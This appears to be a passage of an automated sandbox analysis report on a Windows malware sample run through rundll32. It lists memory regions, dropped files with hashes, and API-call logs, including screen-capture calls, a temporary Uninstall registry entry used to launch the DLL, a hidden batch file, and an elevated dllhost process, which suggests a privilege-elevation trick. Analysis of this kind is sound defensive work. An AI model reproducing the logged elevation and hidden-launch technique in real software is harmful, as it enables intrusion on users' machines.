Thread IDs	0x AE8 0x AF4 0x AF8 0x AFC 0x B00

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000000020000	0x00020000	0x00026fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000030000	0x00030000	0x00033fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000040000	0x00040000	0x00040fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000050000	0x00050000	0x00051fff	Pagefile Backed Memory	Readable, Writable	Region Actions
rundll32.exe.mui	0x00060000	0x00060fff	Memory Mapped File	Readable, Writable	Region Actions
private_0x0000000000070000	0x00070000	0x00070fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000080000	0x00080000	0x00080fff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000090000	0x00090000	0x00090fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000000a0000	0x000a0000	0x000a0fff	Pagefile Backed Memory	Readable	Region Actions
private_0x00000000000b0000	0x000b0000	0x000effff	Private Memory	Readable, Writable	Region Actions Download Dump
locale.nls	0x000f0000	0x00156fff	Memory Mapped File	Readable	Region Actions
private_0x0000000000160000	0x00160000	0x00162fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000170000	0x00170000	0x001cffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000170000	0x00170000	0x00170fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000180000	0x00180000	0x00180fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000190000	0x00190000	0x001cffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x00000000001d0000	0x001d0000	0x001d0fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000001e0000	0x001e0000	0x001e1fff	Pagefile Backed Memory	Readable	Region Actions
private_0x00000000001f0000	0x001f0000	0x001fffff	Private Memory	Readable, Writable	Region Actions Download Dump
rpcss.dll	0x00200000	0x0025bfff	Memory Mapped File	Readable	Region Actions
rpcss.dll	0x00200000	0x0025bfff	Memory Mapped File	Readable	Region Actions
rsaenh.dll	0x00200000	0x0023bfff	Memory Mapped File	Readable	Region Actions
private_0x0000000000200000	0x00200000	0x0021ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000220000	0x00220000	0x0025ffff	Private Memory	Readable, Writable	Region Actions Download Dump
windowsshell.manifest	0x00260000	0x00260fff	Memory Mapped File	Readable	Region Actions
pagefile_0x0000000000260000	0x00260000	0x00261fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000270000	0x00270000	0x00271fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000280000	0x00280000	0x0037ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000380000	0x00380000	0x00447fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000450000	0x00450000	0x00550fff	Pagefile Backed Memory	Readable	Region Actions
cversions.1.db	0x00560000	0x00563fff	Memory Mapped File	Readable	Region Actions
cversions.2.db	0x00560000	0x00563fff	Memory Mapped File	Readable	Region Actions
{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000015.db	0x00570000	0x00595fff	Memory Mapped File	Readable	Region Actions
pagefile_0x00000000005a0000	0x005a0000	0x005a0fff	Pagefile Backed Memory	Readable, Writable	Region Actions
cversions.2.db	0x005b0000	0x005b3fff	Memory Mapped File	Readable	Region Actions
pagefile_0x00000000005c0000	0x005c0000	0x005c0fff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x00000000005d0000	0x005d0000	0x0060ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000610000	0x00610000	0x0064ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000650000	0x00650000	0x0072efff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000730000	0x00730000	0x0082ffff	Private Memory	Readable, Writable	Region Actions Download Dump
{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000009.db	0x00830000	0x0085ffff	Memory Mapped File	Readable	Region Actions
private_0x0000000000880000	0x00880000	0x008bffff	Private Memory	Readable, Writable	Region Actions Download Dump
rundll32.exe	0x008e0000	0x008edfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x00000000008f0000	0x008f0000	0x014effff	Pagefile Backed Memory	Readable	Region Actions
sortdefault.nls	0x014f0000	0x017befff	Memory Mapped File	Readable	Region Actions
{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db	0x017c0000	0x01825fff	Memory Mapped File	Readable	Region Actions
private_0x0000000001840000	0x01840000	0x0187ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00000000018d0000	0x018d0000	0x0190ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000001910000	0x01910000	0x01a10fff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000001910000	0x01910000	0x01d02fff	Pagefile Backed Memory	Readable	Region Actions
appwiz.cpl	0x5eae0000	0x5eb81fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
comsvcs.dll	0x5edd0000	0x5ef05fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
tempdebug.dll	0x5ef10000	0x5ef95fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
osbaseln.dll	0x6ed80000	0x6ed87fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msi.dll	0x70fc0000	0x711fffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
dwmapi.dll	0x736e0000	0x736f2fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
duser.dll	0x73750000	0x7377efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
uxtheme.dll	0x739d0000	0x73a0ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
atl.dll	0x741c0000	0x741d3fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
comctl32.dll	0x742b0000	0x7444dfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
propsys.dll	0x74600000	0x746f4fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntmarta.dll	0x74800000	0x74820fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
version.dll	0x74940000	0x74948fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rsaenh.dll	0x74c20000	0x74c5afff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cryptsp.dll	0x74e70000	0x74e85fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sspicli.dll	0x75320000	0x7533afff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cryptbase.dll	0x75340000	0x7534bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rpcrtremote.dll	0x753e0000	0x753edfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
profapi.dll	0x753f0000	0x753fafff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msasn1.dll	0x75460000	0x7546bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernelbase.dll	0x75470000	0x754b9fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
crypt32.dll	0x755b0000	0x756ccfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sechost.dll	0x756f0000	0x75708fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rpcrt4.dll	0x75710000	0x757b0fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msctf.dll	0x757c0000	0x7588bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shell32.dll	0x758a0000	0x764e9fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
advapi32.dll	0x764f0000	0x7658ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernel32.dll	0x76590000	0x76663fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
clbcatq.dll	0x766f0000	0x76772fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msvcrt.dll	0x76780000	0x7682bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
lpk.dll	0x76830000	0x76839fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
gdi32.dll	0x76840000	0x7688dfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
user32.dll	0x76890000	0x76958fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ws2_32.dll	0x76960000	0x76994fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shlwapi.dll	0x76b40000	0x76b96fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
oleaut32.dll	0x76ba0000	0x76c2efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
imagehlp.dll	0x76c30000	0x76c59fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
iertutil.dll	0x76c60000	0x76e5afff	Memory Mapped File	Readable, Writable, Executable	Region Actions
usp10.dll	0x76e60000	0x76efcfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
urlmon.dll	0x76f00000	0x77035fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wininet.dll	0x77040000	0x77134fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ole32.dll	0x77140000	0x7729bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntdll.dll	0x772a0000	0x773dbfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
nsi.dll	0x773e0000	0x773e5fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
psapi.dll	0x773f0000	0x773f4fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
imm32.dll	0x77400000	0x7741efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wldap32.dll	0x77420000	0x77464fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
apisetschema.dll	0x774e0000	0x774e0fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x000000007f6f0000	0x7f6f0000	0x7f7effff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x000000007ffb0000	0x7ffb0000	0x7ffd2fff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007ffda000	0x7ffda000	0x7ffdafff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007ffdb000	0x7ffdb000	0x7ffdbfff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007ffdc000	0x7ffdc000	0x7ffdcfff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007ffdd000	0x7ffdd000	0x7ffddfff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007ffde000	0x7ffde000	0x7ffdefff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007ffdf000	0x7ffdf000	0x7ffdffff	Private Memory	Readable, Writable	Region Actions Download Dump

Created Files

Filename	File Size	Hash Values	YARA Match	Actions
c:\users\bgc6u8~1\appdata\local\temp\iun4816.tmp	0.00 KB (0 bytes)	MD5: d41d8cd98f00b204e9800998ecf8427e SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855		File Actions Show Properties
c:\users\bgc6u8~1\appdata\local\temp\iun4816.bat	0.24 KB (245 bytes)	MD5: 9cc8f01a19e5c00ef42c554b2aef38fd SHA1: ac464faa791113edc96cc061835dcf5b698d5b01 SHA256: f7a647b095d8948d42f34958dc73fc9ca569399d81251336a59a1a3dcb6fe908		File Actions Show Properties Download

Threads

Thread 0xae8

(Host: 95, Network: 0)

Category	Operation	Information	Count	Logfile
Module	Load	module_name = api-ms-win-core-synch-l1-2-0, base_address = 0x0	2	Fn
Module	Load	module_name = kernel32, base_address = 0x0	1	Fn
Module	Load	module_name = kernel32, base_address = 0x76590000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = InitializeCriticalSectionEx, address_out = 0x765e3879	1	Fn
Module	Load	module_name = api-ms-win-core-fibers-l1-1-1, base_address = 0x0	2	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = FlsAlloc, address_out = 0x765e418d	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = FlsSetValue, address_out = 0x765e76e6	1	Fn
Module	Load	module_name = api-ms-win-core-synch-l1-2-0, base_address = 0x0	2	Fn
Module	Load	module_name = kernel32, base_address = 0x0	1	Fn
Module	Load	module_name = kernel32, base_address = 0x76590000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = InitializeCriticalSectionEx, address_out = 0x765e3879	1	Fn
Module	Load	module_name = api-ms-win-core-fibers-l1-1-1, base_address = 0x0	2	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = FlsAlloc, address_out = 0x765e418d	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = FlsGetValue, address_out = 0x765e1e16	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = FlsSetValue, address_out = 0x765e76e6	1	Fn
File	Open	filename = STD_INPUT_HANDLE	1	Fn
File	Get Info	filename = STD_INPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_ERROR_HANDLE	1	Fn
File	Get Info	filename = STD_ERROR_HANDLE, type = file_type	1	Fn
Module	Load	module_name = api-ms-win-core-localization-l1-2-1, base_address = 0x0	2	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = LCMapStringEx, address_out = 0x7661f72b	1	Fn
Module	Get Filename	module_name = api-ms-win-core-localization-l1-2-1, process_name = c:\windows\system32\rundll32.exe, file_name_orig = C:\Windows\system32\rundll32.exe, size = 260	1	Fn
Environment	Get Environment String		1	Fn Data
Module	Load	module_name = Shlwapi, base_address = 0x76b40000	1	Fn
Module	Load	module_name = Shell32, base_address = 0x758a0000	1	Fn
Module	Load	module_name = Advapi32, base_address = 0x764f0000	1	Fn
Module	Get Filename	process_name = c:\windows\system32\rundll32.exe, file_name_orig = C:\Users\BGC6U8~1\AppData\Local\Tempdebug.dll, size = 260	1	Fn
System	Get Info	type = System Directory, result_out = C:\Windows\system32	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = LoadLibraryA, address_out = 0x765e395c	1	Fn
Module	Load	module_name = psapi.dll, base_address = 0x773f0000	1	Fn
Module	Load	module_name = advapi32.dll, base_address = 0x764f0000	1	Fn
Module	Load	module_name = user32.dll, base_address = 0x76890000	1	Fn
Module	Load	module_name = shell32.dll, base_address = 0x758a0000	1	Fn
Module	Load	module_name = wininet.dll, base_address = 0x77040000	1	Fn
Module	Load	module_name = ws2_32.dll, base_address = 0x76960000	1	Fn
Module	Load	module_name = version.dll, base_address = 0x74940000	1	Fn
Module	Load	module_name = gdi32.dll, base_address = 0x76840000	1	Fn
Module	Load	module_name = ole32.dll, base_address = 0x77140000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = FreeLibrary, address_out = 0x765dd9d0	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetModuleHandleA, address_out = 0x765dcf41	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CreateFileA, address_out = 0x765dcee8	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = ReadFile, address_out = 0x765d96fb	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CloseHandle, address_out = 0x765dca7c	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetFileSize, address_out = 0x765d0273	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = VirtualAlloc, address_out = 0x765e2fb6	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = HeapAlloc, address_out = 0x772f2dd6	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GlobalReAlloc, address_out = 0x765cec90	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = VirtualFree, address_out = 0x765e1da4	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = VirtualProtect, address_out = 0x765d2341	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = HeapFree, address_out = 0x765dbbd0	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetProcessHeap, address_out = 0x765e1280	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = IsBadReadPtr, address_out = 0x765cb6a3	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetNativeSystemInfo, address_out = 0x765cbe77	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = OutputDebugStringA, address_out = 0x765ceb36	1	Fn
Module	Get Address	module_name = c:\windows\system32\gdi32.dll, function = CreateDCA, address_out = 0x7684cca9	1	Fn
Module	Get Address	module_name = c:\windows\system32\user32.dll, function = IsRectEmpty, address_out = 0x768a561e	1	Fn
Module	Get Address	module_name = c:\windows\system32\gdi32.dll, function = CreateCompatibleDC, address_out = 0x76846888	1	Fn
Module	Get Address	module_name = c:\windows\system32\gdi32.dll, function = GetDeviceCaps, address_out = 0x76846f7f	1	Fn
Module	Get Address	module_name = c:\windows\system32\gdi32.dll, function = CreateCompatibleBitmap, address_out = 0x768473ad	1	Fn
Module	Get Address	module_name = c:\windows\system32\gdi32.dll, function = SelectObject, address_out = 0x76846640	1	Fn
Module	Get Address	module_name = c:\windows\system32\gdi32.dll, function = BitBlt, address_out = 0x768472c0	1	Fn
Module	Get Address	module_name = c:\windows\system32\gdi32.dll, function = DeleteDC, address_out = 0x76846eaa	1	Fn
Module	Get Address	module_name = c:\windows\system32\gdi32.dll, function = GetObjectA, address_out = 0x7684914f	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GlobalAlloc, address_out = 0x765d9ce1	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GlobalLock, address_out = 0x765d9e05	1	Fn
Module	Get Address	module_name = c:\windows\system32\gdi32.dll, function = GetStockObject, address_out = 0x76845ddf	1	Fn
Module	Get Address	module_name = c:\windows\system32\user32.dll, function = GetDC, address_out = 0x768a544c	1	Fn
Module	Get Address	module_name = c:\windows\system32\gdi32.dll, function = SelectPalette, address_out = 0x7684a1f6	1	Fn
Module	Get Address	module_name = c:\windows\system32\gdi32.dll, function = RealizePalette, address_out = 0x7684ef91	1	Fn
Module	Get Address	module_name = c:\windows\system32\gdi32.dll, function = GetDIBits, address_out = 0x7684a23b	1	Fn
Module	Get Address	module_name = c:\windows\system32\user32.dll, function = ReleaseDC, address_out = 0x768a5421	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = WriteFile, address_out = 0x765e1400	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GlobalUnlock, address_out = 0x765d9d50	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GlobalFree, address_out = 0x765d9cf9	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = RegCreateKeyA, address_out = 0x764fcd01	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = RegSetValueExA, address_out = 0x765014b3	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = RegCloseKey, address_out = 0x7650469d	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = RegDeleteKeyA, address_out = 0x7651a8b7	1	Fn
Module	Get Address	module_name = c:\windows\system32\ole32.dll, function = CoInitialize, address_out = 0x7715b636	1	Fn
Module	Get Address	module_name = c:\windows\system32\ole32.dll, function = CLSIDFromString, address_out = 0x7715e599	1	Fn
Module	Get Address	module_name = c:\windows\system32\ole32.dll, function = CoGetObject, address_out = 0x7719b68d	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = MultiByteToWideChar, address_out = 0x765e452b	1	Fn
Module	Get Address	module_name = c:\windows\system32\ole32.dll, function = CoUninitialize, address_out = 0x771886d3	1	Fn
Registry	Create Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\CutBat	1	Fn
Registry	Write Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\CutBat, value_name = szDisplayName, data = CutBat, size = 6, type = REG_SZ	1	Fn
Registry	Write Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\CutBat, value_name = UninstallString, data = C:\Windows\system32\rundll32.exe C:\Users\BGC6U8~1\AppData\Local\Tempdebug.dll SSSS, size = 83, type = REG_SZ	1	Fn
Registry	Delete Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\CutBat	1	Fn
File	Create Temp File	filename = C:\Users\BGC6U8~1\AppData\Local\Temp\iun4816.tmp, path = C:\Users\BGC6U8~1\AppData\Local\Temp\, prefix = iun	1	Fn
File	Delete	filename = C:\Users\BGC6U8~1\AppData\Local\Temp\iun4816.tmp	1	Fn
File	Create	filename = C:\Users\BGC6U8~1\AppData\Local\Temp\iun4816.bat, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ	1	Fn
File	Write	filename = C:\Users\BGC6U8~1\AppData\Local\Temp\iun4816.bat, size = 245	1	Fn Data
Process	Create	process_name = C:\Users\BGC6U8~1\AppData\Local\Temp\iun4816.bat, show_window = SW_HIDE	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = FlsFree, address_out = 0x765e1f61	2	Fn

Thread 0xaf8

(Host: 1, Network: 0)

Category	Operation	Information	Success	Count	Logfile
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = FlsGetValue, address_out = 0x765e1e16		1	Fn

Process #5: dllhost.exe

Information	Value
ID	#5
File Name	c:\windows\system32\dllhost.exe
Command Line	C:\Windows\system32\DllHost.exe /Processid:{FCC74B77-EC3E-4DD8-A80B-008A702075A9}
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:00:47, Reason: RPC Server
Unmonitor	End Time: 00:02:15, Reason: Terminated by Timeout
Monitor Duration	00:01:28
Remarks	No high level activity detected in monitored regions

OS Process Information

Information	Value
PID	0xb54
Parent PID	0x258 (c:\windows\system32\svchost.exe)
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	F71GWAT\BGC6u8Oy yXGxkR
Groups	F71GWAT\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) BUILTIN\Administrators (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, OWNER) BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Logon Session 00000000:0000fcb0 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID) LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x B70 0x B6C 0x B68 0x B64 0x B60 0x B5C 0x B58

Region

Name	Start VA	End VA	Type	Permissions	Actions
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000030000	0x00030000	0x00033fff	Pagefile Backed Memory	Readable	Region Actions
locale.nls	0x00040000	0x000a6fff	Memory Mapped File	Readable	Region Actions
private_0x00000000000b0000	0x000b0000	0x000b0fff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x00000000000c0000	0x000c0000	0x000c0fff	Pagefile Backed Memory	Readable	Region Actions
private_0x00000000000d0000	0x000d0000	0x001cffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x00000000001d0000	0x001d0000	0x001d0fff	Pagefile Backed Memory	Readable	Region Actions
private_0x00000000001e0000	0x001e0000	0x001fffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000200000	0x00200000	0x00201fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000210000	0x00210000	0x0024ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000250000	0x00250000	0x00317fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000330000	0x00330000	0x00331fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000380000	0x00380000	0x003bffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000420000	0x00420000	0x0042ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000430000	0x00430000	0x00530fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000590000	0x00590000	0x005cffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00000000005d0000	0x005d0000	0x0060ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000670000	0x00670000	0x006affff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x00000000006b0000	0x006b0000	0x0078efff	Pagefile Backed Memory	Readable	Region Actions
private_0x00000000007a0000	0x007a0000	0x007dffff	Private Memory	Readable, Writable	Region Actions Download Dump
dllhost.exe	0x00890000	0x00894fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x00000000008a0000	0x008a0000	0x0149ffff	Pagefile Backed Memory	Readable	Region Actions
sortdefault.nls	0x014a0000	0x0176efff	Memory Mapped File	Readable	Region Actions
private_0x00000000018f0000	0x018f0000	0x0192ffff	Private Memory	Readable, Writable	Region Actions Download Dump
appwiz.cpl	0x5eae0000	0x5eb81fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
osbaseln.dll	0x6ed80000	0x6ed87fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msi.dll	0x70fc0000	0x711fffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
duser.dll	0x73750000	0x7377efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
uxtheme.dll	0x739d0000	0x73a0ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
atl.dll	0x741c0000	0x741d3fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
comctl32.dll	0x742b0000	0x7444dfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
propsys.dll	0x74600000	0x746f4fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rsaenh.dll	0x74c20000	0x74c5afff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cryptsp.dll	0x74e70000	0x74e85fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cryptbase.dll	0x75340000	0x7534bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rpcrtremote.dll	0x753e0000	0x753edfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernelbase.dll	0x75470000	0x754b9fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sechost.dll	0x756f0000	0x75708fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rpcrt4.dll	0x75710000	0x757b0fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msctf.dll	0x757c0000	0x7588bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shell32.dll	0x758a0000	0x764e9fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
advapi32.dll	0x764f0000	0x7658ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernel32.dll	0x76590000	0x76663fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
clbcatq.dll	0x766f0000	0x76772fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msvcrt.dll	0x76780000	0x7682bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
lpk.dll	0x76830000	0x76839fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
gdi32.dll	0x76840000	0x7688dfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
user32.dll	0x76890000	0x76958fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shlwapi.dll	0x76b40000	0x76b96fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
oleaut32.dll	0x76ba0000	0x76c2efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
usp10.dll	0x76e60000	0x76efcfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ole32.dll	0x77140000	0x7729bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntdll.dll	0x772a0000	0x773dbfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
imm32.dll	0x77400000	0x7741efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
apisetschema.dll	0x774e0000	0x774e0fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x000000007f6f0000	0x7f6f0000	0x7f7effff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x000000007ffb0000	0x7ffb0000	0x7ffd2fff	Pagefile Backed Memory	Readable	Region Actions
